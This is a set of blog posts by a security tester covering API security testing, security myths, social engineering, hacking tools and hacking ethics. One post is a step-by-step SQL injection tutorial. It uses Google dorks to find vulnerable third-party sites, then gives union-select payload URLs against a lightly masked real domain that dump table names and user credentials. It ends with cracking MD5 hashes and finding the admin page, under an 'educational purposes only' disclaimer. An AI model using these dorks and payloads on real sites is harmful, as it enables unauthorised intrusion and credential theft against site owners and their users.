Experience of Security testing on API’s


This blog post is all about my first experience with Security Testing on APIs. Back in 2013, I was working on a project “XYZ” in Moolya Software Testing. It all started on April 1st of 2013 when Pari, the “Master Shifu” sent me the mail with the details of the project, which is an advanced voicemail service especially for business people who do not want to miss the calls, at busy times. Ok, now what form is the product in? Is it web app/mobile app? No, those were API’s; we didn’t have any idea on APIs. First task was to understand API and its functionality. Learnt about the API from team members and by exploring on the internet. Understood what an API is, why are they there for an app and how they are used in an app?

An API — Application Programming Interface — allows your product to communicate with each other. In this way, an API allows you to open up data and functionality to other developers and to other businesses.

As API’s act as a backbone for any application, in simple words which are of pure technical stuffs which communicate between presentation layer and the database. API’s reside in business layer and we can test them for its core functionality. And testing functionality of the application in this state will help reducing maintenance of the application. This triggered me to test the API for its security, which would result in great impact on the product or the application. And that is where I decided to do security testing on API’s. Now coming back to the project, what are we supposed to test, what are the requirements, why are we testing, scope of testing, etc were some of the questions that arose.

After getting clarity on all these queries, we started testing. The next issue was to understand windows azure. These were not normal API’s but were built on different technology (Windows Azure). Initially we explored about this technology and started testing. Then there was a dilemma in selecting the tools for testing API’s. We have numerous tools for testing API, selecting the best tool which suites the project was difficult. Finally I landed up on selecting SoapUI, which helps in Manual/Automation testing. Continued with API automation, which was my primary task. Meanwhile, I was testing manually for its functionality.  I thought, why don’t I start security testing on API’s? Now the question was how? Where? Now comes the exploration part on testing API for its security. In simple words, how can a hacker misuse API, what are the effective attacks on API? Santhosh Tuppad who is a well-known security tester suggested me with a book called “Hacking web services” by Shreeraj Shah, which helped me in understanding what kind attacks can be done on APIs.

Now coming to the attacks mentioned in the book, some of the attacks were simply great, but most of them were outdated. Where today’s servers are built in such a way, where it can handle these kinds of attacks in the initial stages. Now coming back to the project, First task was to note different type of attacks or vulnerabilities.

While I was reading, Shreeraj Shah’s book on Hacking Web Services, I found out that they were traditional approaches. However, it was helpful in understanding several concepts. The challenge was to learn new techniques or new ways of hacking web services. There started my exploration! Well, I was doing black box testing, it all depends how much Quality we want to bring in with testing as a black box tester. While performing the web services testing, I didn’t actually look into the code of the application (like the White box tester’s do). I tried to cover all the possible scenarios’ using the tool (SoapUI). The “Groovy Script” came into picture when I started performing the check automation of regular testing on API’s. Though it is not necessary to learn Groovy to perform testing, it surely gives an extra advantage over other testers 😉

Tests that I performed to find vulnerabilities,

  • Insecure Direct object Reference

  • Information Leakage and improper error handling

  • Authentication and Certification/Permission and Access Issues

  • Authorization

  • SQL/LDAP/XPATH/OS Command Injection

  • Virus/Spyware/Malware Injection

  • Session/Parameter Tampering

  • Denial of Service/Large Payload

  • Brute-force

  • Data type mismatch/Content Spoofing

  • Information Leakage/Error leakage

  • Replay Attacks

  • Buffer Overflow

  • XML Parsing Attacks

  • Spoiling Schema

  • Complex and Recursive structure as payload

  • Fault Code Leaks/Poor Policies

Learning the basic level of Security on API was fun & easy. To master the same anyone will need to get good grip over basic vulnerabilities. As a starting point for above mentioned attacks, I searched forums & blogs for detailed information.

When malicious requests are executed number of technical layers can be targeted, including,

  • NIC (Network interface Card) and its drivers.

  • Operating System, as it processes the incoming request from the NIC.

  • Target application server that handles the request (for example Apache, IIS, etc.)

Let me explain this in a little more detail on how I could manage to accomplish the task, which is Security testing on API’s.

When I come to think of it – how would I identify security vulnerabilities in the first place? What response would I get back when trying, for example a SQL Injection attack that would allow me to identify that there is security vulnerability? Actually, this wasn’t that easy.

More often I will get an error message back that tells me that the service was unavailable to process the malicious request – this might be a good thing during development but that was one of the situations where I needed to don the hat of the hacker; does the error message tell me something I shouldn’t know about the system? For example which database they are using? Which version? Which language or framework? Maybe it exposes internal IP address? Any of these might be exactly what the hacker is looking for, the information allows them to target specific attacks on your application (there are publicly available databases of known security issues in most software like “Exploit DB”) which in turn might give them the backdoor, what an attacker would have been looking for. It’s something called as “Sensitive Information Exposure” it searches messages returned by application for any information that might expose system details to the hacker – version numbers, software technologies, etc.

Other scenario was tests resulting in a Denial of Service. These are unusual but valuable in the sense that, I found them first and can make sure that they won’t happen again so that the end users using the application are not affected. The actual responses to a Security Test and how to interpret them from a security point of view was one of the major issue which I faced, it requires corresponding system knowledge and understanding to be able report them, that would pin point exploits in responses which helped me the most.

Finally I conclude that,

  • Neglecting possible security vulnerabilities and related issues in your services and APIs can put your data and your business at serious risk.

  • Taking security seriously and building basic expertise around it is an investment well worth making.

  • The core mechanics of most security vulnerabilities are easy to understand, test for, and prevent.

Information Security Myths

Do you think protecting a organization from bad guys is an easy task? not as easy as you/people think, indeed its a difficult task to handle. War between hackers and pentesters on securing and exploiting a website is on one such task which is ageing from past 10+ years, worst part is high level management with in an organization is unaware of risks involved in not prioritising security.

Not just startups even some MNCs fail to take a baby step  towards securing their organization because of some of the below security myths.


  1. My organization has passed security compliance from ISO 27001 hence its completely secured

  2. Network/ Application security audits catch all the vulnerabilities

  3. Web Application Security Assessments find all vulnerabilities and no way bad guy can hack

  4. My developers are skilled, We never had any data breaches on our organization and we are safe!

  5. Secure Socket Layer (SSL) Protects my website

  6. We are a mid-size and with limited network/application, hence security is not an issue

  7. We have widely used firewalls and routers which defend us from attacks

  8. Blame game within an organization between developers of application side and network side(lack of information)

  9. Programming/Scripting languages used are secured languages

  10. We don’t have anything worth to steal or trouble

  11. Anti-Virus is protecting me against malware’s and fresh exploits

  12. Data stored in our systems are encrypted/salted and completely under our control

Information Security Myth's

What is Social Engineering?


Hmmm. I decided to write this blog keeping aside my inhibitions, and I’m happy I am doing it, particularly, this one!

Okay, I assume you would have heard of something called “Social Engineering”.  If yes, are you aware that there is no patch for human stupidity with respect to Social engineering?  According to me, this is true, as we see many companies/users getting victimized even after many past experiences.

Human beings are weakest links!

What is Social Engineering
Courtesy: http://socialengineeringattacks.blogspot.com

Social Engineering is an art of wangling people to reveal confidential information which is not supposed to be told out. It involves gaining the trust of an individual in order to obtain confidential information. Social Engineering is a non technical attack but involves tactics for making a victim get trapped. This is an art of gaining important information about an organization, its employees, systems etc.

What is Social Engineering

Here, the victim can be anybody; where which includes a high possibility of a hacker himself getting victimized at times! This would be possible when the hacker could be a part of a group of friends, and the entire  group can be victimized at once, as it is completely based on trust where tricking them emotionally would not be very difficult.

Sometimes, it so happens that  in a continuous conversation, we do not even realize that we are revealing personal & confidential information, or end up revealing some hints, which will in turn make the job of a hacker easier, to hack into their extremely personal & confidential information.

Some basic information which can be gathered very easily would include a person’s favorite color, actor, food, car, teacher, best friend etc. It might even include some of the information about childhood, school days or about his/her family. Such information would suffice to an extent in order to hack into any account, as the secret questions to recover the password for any application would mostly involve these.

Let assume, you have become the victim. Now, do you mind answering any questions like your favorite teacher or your pet name or any such questions mentioned above? If you have a very close friend who would try for a social engineering attack does not have to ask you for any such questions, he would be aware of you and your likes and dislikes up to some extent.

A sample Email which can misslead the admin of an organization (An example for social engineering
A sample Email which can mislead the admin of an organization

Generally if you ask for a piece of sensitive information, people naturally become suspicious immediately. If you pretend you already have the information and give out wrong information, they will frequently correct you unconsciously – thereby rewarding you with the correct piece of information you are looking for.

Social engineering toolkit! No, we do not need a SET to victimize anyone! Real-time hackers do not completely depend on social engineering tool kit.

Social Engineering

Preventing Social Engineering:

In my opinion, I don’t think there is any well defined way or application which helps user to prevent social engineering. Different methods are being evolved hence having an eye on different attacks is recommended.

Educating employees of an organization and performing random tests on them might be helpful to identify the mouse traps within the organization, it is recommended not to share their passwords even with their higher authorities or team leaders, let them have an administrator password if access required.

Organizations have to take care of social engineering too, along with other security attacks as it holds more than 50% of share on different attacks.

Frequency of social engineering when compared to other security Attacks.

Frequency of different Security Attacks
Frequency of different Security Attacks

Courtesy: http://securitywize.com/the-risk-of-an-uncertain-security-strategy/1430

If you have any methods of preventing social engineering or any other social engineering cases you are aware of (attention-grabbing) please comment. Let others know your experience.

Security Testing for Beginners

Recently, I authored an article at TestingCircus e-magazine and I like to publish the same on my blog so that I can reach out to my readers who are not subscribed to testingcircus or couldn’t read due to whatsoever reason(s).

Thanks to Mr. Santhosh Tuppad for encouraging me to write this article and Mr. Ajoy Singha for providing me an opportunity to write for TestingCircus and I am looking forward to continue my contribution to TestingCircus e-magazine by writing, you can find my article in the following link  http://www.testingcircus.com/testing-circus-2013-september-edition/

Without much ado, here I present you with my article.

There is no wrong way to start hacking, everything is right way and I have my own way. Whatever your style of hacking is, make sure it’s consistent. If you are starting out today you can be benefited based on your skill sets. Don’t learn to hack, hack to learn.

Well, coming to the point how did I start hacking or how did I land up here, It was in the year 2008. I was in my 2nd year diploma where one of my friends was trying to download videos by searching on Google. In 2008, getting a video to your local machine was one of the biggest achievements for people of my age. My friend showed me how to get the videos from Google, by extracting only videos from the vast search results. He asked me to enter some string along with the search query.

Filetype: avi <Search Query>

He didn’t know what it was, and he told that he came to know about it through his senior. Ok!! As I am very much interested in computer technologies, I tried to find out what they are. I referred to many articles and found that they are called as GOOGLE DORKS. I even came across some of the terminologies like White, Black and Grey hat hackers. During this phase, I got a common response from whoever I asked about hacking, which was “Hacking is very difficult and I don’t know anything on it except that it is illegal”.

But, it is not illegal as I told you before. There are 3 categories of hackers:

  • Black Hat Hackers
  • White Hat Hackers
  • Grey Hat Hackers

Black Hat hackers are those who perform undercover hacking for malicious reasons and also with intent to harm others, such people can also be referred to as ‘crackers’.

White Hat hackers are those who perform hacking for legitimate reasons and use their skills and knowledge for good, e.g. IT Security technicians testing their systems and researchers testing the limitations of any software.

Grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect.

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web form to get Sensitive Information like (User Name, Passwords) to access the site and deface it. The traditional SQL injection method is quite difficult, but nowadays there are many tools available online through which any script kiddie can use SQL Injection to deface a website. Because of these tools, websites have become more vulnerable to these types of attacks. Some of the tools used for SQL Injection are mentioned in this article. However, as I know nothing is bug free and there will be exploits every minute/hour.

Some of the tools which help in finding the vulnerabilities are discussed below:

1.      Wireshark is also known as Etherea. It is one of the most powerful tools in a network security, as a network packet analyzer on any network. It is used to capture each packet sent to or from your system to the router. If you’re capturing on a wireless interface and have promiscuous mode (Admin/super user) enabled in your capture options, you’ll also see other packets on the network sent from different nodes. This also includes filters ex: DNS, TCP, UDP, ip.addr etc), color-coding, capturing packets and other features that let you dig deep into network traffic. Wireshark is an extremely powerful tool; this is just scratching the surface of what you can do with it. Professionals use it to debug network protocol implementations, examine security problems and inspect network protocol internals. To get this position, it takes a fair amount of practice. It takes practice to know how and where to capture right data, filters to use, and how to interpret the data.

People willing to learn can use this link to get sample captures on Wireshark to get experience hands on this http://wiki.wireshark.org/SampleCaptures

2.      Fiddler is an open source web debugging tool which captures all the traffic between your computer and the internet, it also acts as proxy between the browser or any application on the local machine and the internet say, all the traffic flows through the fiddler and the requests can be altered and the altered request is been sent to the server. In simple words fiddler sits between HTTP client that is the browser and the HTTP server.

Normally it would be configured with all the browsers being used on a particular machine or you may have to manually configure the browser to capture all the traffic in/out of our machine.

Fiddler can also be used to find the statistics, inspect the request or the response and can even act as an auto responder and is capable of sending request from the fiddler wit out any browser. Fiddler is designed in such a way that it capability to run API’s through composer functionality and can even right some scripts which can be helpful for check automation and has the capability to decrypt HTTPS traffic.

3.      Nessus, the first public release was in 1998. Nessus was an open source vulnerability scanner, recently nessus turned into a paid tool. This tool is used for scanning both web application and network, Network can be either internal or external IP/Network. Nessus is designed to automate the testing and discovery of known security problems. Allowing system administrators to correct problems before they are exploited.

Nessus uses a client server design that allows the user to set up one server that has multiple nessus clients that can attach and initiate vulnerability scans, where servers can be placed at various strategic points on a network allowing tests to be conducted from various points of view.

Nessus security checks vulnerabilities and database is updated on a daily basis which could be retrieved to cross check the database with the command “nessus-update-plug-ins”.

4.      IBM Rational AppScan is an automated web vulnerability scanner which helps in finding the vulnerabilities quickly and effectively, even a svan (semi technical person) can also use the tool and find vulnerabilities.  Using IBM app scan, we can decrease the risks in web application attacks and data breaches. It helps in testing the web application either on production site or on any staging sites which can ensure that it checks for web attacks.

Basically in IBM AppScan once you add a web app to test for its security the initial step is to crawl all the pages/links on that application which are allowed to be crawled based on robots.txt

Basic functionalities of IBM AppScan are

  1. Gives the larger coverage of test report
  2. It mainly concentrates on top 10 OWASP (Open Web Application Security Project) web application vulnerabilities.
  3. Accurate and advanced scanning algorithms used hence less false positives
  4. Recommendations, Which I personally like here, It gives us description of each vulnerability found and the risk involved in not fixing it.

As we all know automated scanning is not perfect all the time and is not advisable to completely depend on automated scanner, hence they have provided a manual scanning for any vulnerability found to give the perfect solution without false positives.

IBM app scan is a paid tool and it has a trial version as well if you are interested in exploring the application.

5.      Nmap, also known as “network mapper”, it is an open source application which helps in quickly scanning different ranges of devices such as desktops/laptops or any mobile devices and provide valuable information about the devices which are connected to a particular network. Nmap is available for all the platforms where it can be operated in 2 ways, command mode and GUI mode but most people prefer command mode for its advanced features but requires technical knowledge.

Nmap uses raw IP packets to determine what hosts are available on the network (Host Detection), the services that are enabled, the operating system and version, using TCP SYN or a TCP Connect ping to gather active hosts. Nmap is used by security researchers and hackers who want to find the weakness and exploit them.

Nmap can provide different types of scans, where some are more aggressive and some are simple, designed to be stealthy and scan undetected. Depending on the type of scan performed, different information can be discovered; some of the scans are Ping, SYN Stealth, UDP Scan, IP Protocol Scan, ACK Scan, RPC Scan, List Scan etc.

6.      Havij is an automated SQL Injection tool that helps hackers or security researchers to find and exploit SQL Injection vulnerabilities on a web page on a vulnerable web application, using Havij user can access database, retrieve DBMS users and  password, dump tables and columns, fetching data from the database, running SQL  statements and  executing commands on the  operating system.

Hackers use Havij along with vulnerability scanners such as IBM AppScan or Web Inspect, vulnerability scanners find vulnerabilities but not help you in actual exploitation and that’s where Havij showcases its functionality.  In other words, vulnerability scanners will help you in finding list of vulnerable webpage’s whereas; Havij helps you with the access to the database for entire exploitation.

Once URL is feed to the Havij, it comes up with a list of databases being used, version, and db-name’s. Later selecting a particular database we can drill down to tables, and then to columns and even to the actual data. Passwords would hashed usually, there are set of de-crypter’s  associated with the tool which help user to decrypt the hashed password, it is also associated with an algorithm which helps users to find the admin page of a particular web application. In simple words it’s more useful for hackers than security researchers.

7.      SQLMap is one of the most popular and powerful open source SQL injection automation tool, which is built on python and can run on any platform if python is installed in it.

Giving a vulnerable URL, SQLMap can exploit the database and provides with sensitive information like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions.

We can run this application only on command mode and doesn’t have an interface, and has simple commands to extract information from the database.

Tutorial on SQL Injection

Big time!!! Been long time since I posted this blog, this would be something interesting than usual one which helps you to bring out the hacker inside you 😉 SQL Injection which is commonly known as SQLI! Here I would be demonstrating about SQLI which is the one of the top 10 vulnerabilities listed in OWASP (Online Web Application Security Project) not just one of the top 10 vulnerabilities but oldest and topmost from so many years.

This blog, no I can say tutorial! This tutorial gives you the idea to get into any database which has SQL vulnerability. So let’s go ahead with basics.

What is SQL?
SQL (or Structured Query Language) is a special-purpose programming language designed for managing data held in a relational database management system (RDBMS).

What is SQL Injection?
SQL injection is a code injection technique that exploits security vulnerability in an application’s software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
To start with this exploitation we can utilize Google in finding the sites which has possibility of having the application vulnerable using Google Dorks.

What are Google Dorks?
Google dorks or Google Operators are the center of attraction for Google Hacking, which helps in extracting required information from the Google. Many hackers use Google to find vulnerable webpage’s and later use these vulnerabilities for hacking. You can get a list of Google Dorks here

Using Google Dorks:

But for now the only Google dorks we will be using for extracting required information are,

  • inurl:index.php?id=
  • inurl:page.php?id=
  • inurl:prod_detail.php?id=

These will list all websites containing ” prod_detail.php?id=in the URL. (Depending on Dork we are using)

NOW, enter that into Google and start opening WebPages. Finding SQLI Vulnerabilities in websites is very simple. You can simply use a single ‘ or a ” at the end of the URL.

Example: http://www.example.com/index.php?id=1&#8242;
Example: http://www.example.com/index.php?id=1&#8243;

If the website is vulnerable it will produce an error which is similar to the following:

Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

If you see this that means you have found a SQL Injection vulnerability in the website. For security purpose let’s consider domain as “example” for this tutorial:

Exploiting the vulnerability


SQL Injection Error Message
This shows that the website is vulnerable to SQL injection.

Step 1: Finding how many columns the site has

To do this we use the Order by query to find how many columns it has.

http://www.example.hu/prod_detail.php?id=837 order by 100–

We will most likely get an error saying,

Query failed: 1054 – Unknown column ‘100’ in ‘order clause’
Select products_model, products_name, products_short, products_image, products_price, products_status, products_describe, categories_name, manufacturers_name from products join manufacturers on (fi_manufacturers = id_manufacturers) join categories on (fi_categories = id_categories) where id_products = 837 order by 100–

SQL Injection Error on Colomns
That means the number is too high so we will lower it.

http://www.example.hu/prod_detail.php?id=837 order by 10–

If we get an error yet again, the number is still too high, try with lesser value. Let’s take 7

http://www.example.hu/prod_detail.php?id=837 order by 7–

The page will most likely load successfully, if not, then the site may not be fully vulnerable to SQL injection. If it loads successfully increase the number yet again. Once you get to the Max number where it loads successfully, that is the amount of columns a site has. Here in this example it is 9.

http://www.example.hu/prod_detail.php?id=837 order by 9–

SQL Injection Order By
Step 2: Finding the vulnerable columns.

To do this we use Union All Select. Like So,

http://www.example.hu/prod_detail.php?id=837 union all select 1,2,3,4,5,6,7,8,9–

With some sites that won’t be enough to find the vulnerable columns, sometimes it needs the extra push, so we need to force the error. Add a behind the 837 like this prod_detail.php?id=-837

The URL should look like,

http://www.example.hu/prod_detail.php?id=-837 union all select 1,2,3,4,5,6,7,8,9–

SQL Injection Union Slect All

Now it will show the vulnerable columns. The vulnerable columns will be numbers that weren’t there before; the page will also look a lot different. In this case Columns 1, 2,3,7,8 and 9 are vulnerable.

Step 3: Exploiting vulnerability

Now, here comes the hardest part as people think but it’s not that hardest! Mind it; anything is possible if you love it. Let’s just collect some info about the site. Such as Database Name, User Name, and the Version. Remember the vulnerable columns from before? This is where we use them!

In your Union All Select statement replace the vulnerable column numbers with the three bits of info you want. [Database(), User(), Version()].

http://www.example.hu/prod_detail.php?id=-837 union all select version(),database(),user(),4,5,6,7,8,9–

SQL Injection Command Execution

Where the 1,2,3 were on the page before (Or whatever vulnerable column number you used) The bits of information will show on this website, the three pieces of information are,

Database(): web***2
User(): web***u @ localhost
Version(): 5.6.10-log

Great, our first bits of extracted data! We should get some more information. Now before we continue on there are something’s that you’ll need.

  1. Firefox Browser
  2. HackBar Plugin

Okay let’s continue, Next step is to list all the tables. We will now use Group_Concat(table_name) and from information_schema.tables where table_schema=database()–

Don’t worry its simpler than it looks! URL looks like this,

http://www.example.hu/prod_detail.php?id=-837 union all select 1,2,3,4,5,6,group_concat(table_name),8,9 from information_schema.tables where table_schema=database()–

Hey Look! Tables 😉

categories, config, contents, counter, manufacturers, news, orders, orders_products, products, user

SQL Injection Tables

Well done you’ve successfully extracted the table names. But wait, there’s more! Sadly there is no admin table, but sometimes there is. So let’s go with exploring user table.

Have you installed that Firefox plug-in yet? Because you are going to need it now.

Next thing you need to do is replace Group_Concat(Table_Name) with group_concat(Column_name). If you have HackBar installed press F9, click SQL drop down button go to MySQL then click MySQL CHAR() and Enter the table name.

In this case, user and replace from information_schema.tables where table_schema=database()– with from information_schema.columns where table_name=MYSQLCHAR

The Char will be the code you receive from HackBar in this case user can be encoded as CHAR (117, 115, 101, 114)

The Final URL will look like this:

http://www.example.hu/prod_detail.php?id=-837 union all select 1,2,3,4,5,6,group_concat(column_name),8,9 from information_schema.columns where table_name=CHAR(117, 115, 101, 114)–

Okay, cool, we have the column names now.


SQL Injection Columns

Now our next task is to get the data from these columns. To do this replace group_concat(column_name) with group_concat(Column_name_2,0x3a,Column_name_3) Where Column_name_2 and Column_name_3 are the column names you want to extract data from. Such as user_name and user_pw.

Now change from information_schema.columns where table_name=CHAR to from user if you want to extract data from a different table name change user to the table name you want to extract data from.

The URL looks like this,

http://www.example.hu/prod_detail.php?id=-837 union all select 1,2,3,4,5,6,group_concat(user_name,0x3a,user_pw),8,9 from user—

SQL Injection Credentials

We’ve now extracted data! Good Job.

Now we got user table which also contains the admin credentials and we found Username and Password of user you will find MD5 hashed passwords usually. Too decrypt these go to md5decrypter.co.uk it’s a great site!

You also need to find the admin control panel, try simple URL’s like /admin or /login etc. look on Google for an admin page finder tools. Hope this helps you!

This blog is purely for educational purposes only. Information posted is not intended to harm anyone or any organization.

If anyone wants to have the document on your local system, download it here.

What Is Hacking

What is hacking?? What is hack?? Who is hacker?

The main intention of this blog is to educate people about hacking. Most of the people I have met have a different and confusing meaning of hacking. The most common answer which I heard was “getting password of a different user i.e. unauthorized access or stealing money from others account”.

This perception on hacking is because of lack of information or what people have heard. Similar situation appeared in one of the talks on Information Security which was held at one of the famous engineering college in Bangalore by Santhosh Tuppad who is a security specialist and my Guru. Students showed a great interest as the talk was regarding hacking/security, but initially when they were asked, what hacking is, the answers were again the same old. This inspired me to write this blog, so that it helps in understanding more on hacking.

The term Hacker was first introduced in 1960’s and was used to describe a programmer or someone who hacked out computer code. Later the term evolved to an individual who had an advanced understanding of computers, networking, programming, or hardware, but did not have any malicious intents.

Hacking is a practice of altering or modifying the features of a system or an application, in order to accomplish a goal outside the creator’s original design or aim. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker.

Recently, Computer hacking is the most popular form of  hacking , mainly in the field of Information Security, but hacking exists in many other forms like cellular hacking, web app hacking, network hacking etc. and its not limited to this and can be extended to anything in this world. Just because of great attention given to black hat hackers from the social media, the whole hacking term is often mistaken for any security related cybercrime. This damages the reputation of all hackers, and is very bad and unfair. The other intention of this blog is to introduce people the true ethics of hackers, hopefully clearing the blame they are facing now and giving them the social status which they actually deserve.

Crackers!!! Malicious attacks on computer networks are officially known as cracking, these are another set of people who call themselves as hackers, but technically speaking they aren’t. These are people who break into computers and phreaking the phone system with minimal knowledge on the system or the application and loudly call themselves as hackers. But many journalists and writers have been fooled into using the word hacker to describe crackers.

Hackers solve problems in their own way, they solve problems in different way. Actually the way of thinking itself is different and they believe in freedom and live as they wish to. To be recognized as a hacker, you have  to set your own rules and attitude which suits your identity and to behave as though you have a great attitude and passion on yourself.

Hacktivist!!!! He is considered as an hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks. In more extreme cases, hacktivism is used as tool for Cyber terrorism.

The people who actually build Web applications are not paying much attention to security. Stakeholders are looking for people who are creative and able to build interesting Web sites rather than secured websites. They rate security to No. 6 and creativeness to No. 1

Reasons for hacking are very different like,

  • Criminal intent: stealing credit card numbers, harming a competing company, extortion of money by threatening to hack again or reveal sensitive information found on the computer and other reasons.
  • Ideological reasons: Some hackers would attack sites that go against their worldview  anti-globalists hack sites of large corporations, some groups of Muslim hackers attack Israeli sites from time to time, and sites of racist organizations often come under attack.
  • Personal revenge: Some hackers would use their skills to harm people for real or perceived wrongs, to either ruin their computer or find personal information and make it public.
  • Some hackers simply attack in order to harm. They are angry at the world for something, and hacking is their way to perform vandalism.
  • Some hackers attack to check their skills at computer safety. Sometimes those attacks will cause no harm, and in some cases the hacker will inform the victims of failure in his defenses.

Well.. last but not least, Hacking is an art. It won’t happen overnight. Hacking is a game to prove how smart you are.  Start by learning a programming language. Depending on what you want to do (Web Hacking or System Hacking)